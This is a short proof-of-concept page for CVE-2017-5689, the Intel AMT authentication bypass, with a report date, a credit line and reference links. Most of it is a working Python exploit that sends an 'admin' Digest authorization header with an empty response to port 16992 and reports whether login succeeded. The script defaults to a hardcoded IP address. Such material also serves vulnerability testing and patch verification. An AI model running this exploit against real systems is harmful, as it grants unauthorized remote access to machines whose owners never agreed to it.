# CVE-2017-5689

- Report: March 2017
- Credit: Maksim Malyutin from Embedi

## PoC

```python
#!/usr/bin/env python
import requests
import sys

if len(sys.argv) > 1:
   ip = str(sys.argv[1])
else:
   ip = '168.235.84.117'

url = 'http://'+ip+':16992/index.htm'
req = requests.get(url)
auth = req.headers['WWW-Authenticate']
words = auth.split('"')
headers = 'Digest username= "admin", realm="'+words[1]+'", nonce="'+words[3]+'", uri="index.htm", response="", qop="auth", nc="00000001", cnonce="8858482c60513ab5" '
poc = requests.get(url, headers={'Authorization': headers})
if poc.status_code == 200:
   print('Success')
else:
   print('Failed')
```

## Reference

- [Mitigating CVE-2017-5689, an Intel Management Engine Vulnerability](http://blog.trendmicro.com/trendlabs-security-intelligence/mitigating-cve-2017-5689-intel-management-engine-vulnerability/)
- [Explained — How Intel AMT Vulnerability Allows to Hack Computers Remotely](http://thehackernews.com/2017/05/intel-amt-vulnerability.html)
- [http-vuln-cve2017-5689 NSE Script](https://nmap.org/nsedoc/scripts/http-vuln-cve2017-5689.html)
- [simple python poc for CVE-2017-5689](https://github.com/kd0kkv/intel_amt_bypass)
- [CVE-2017-5689](https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5689)
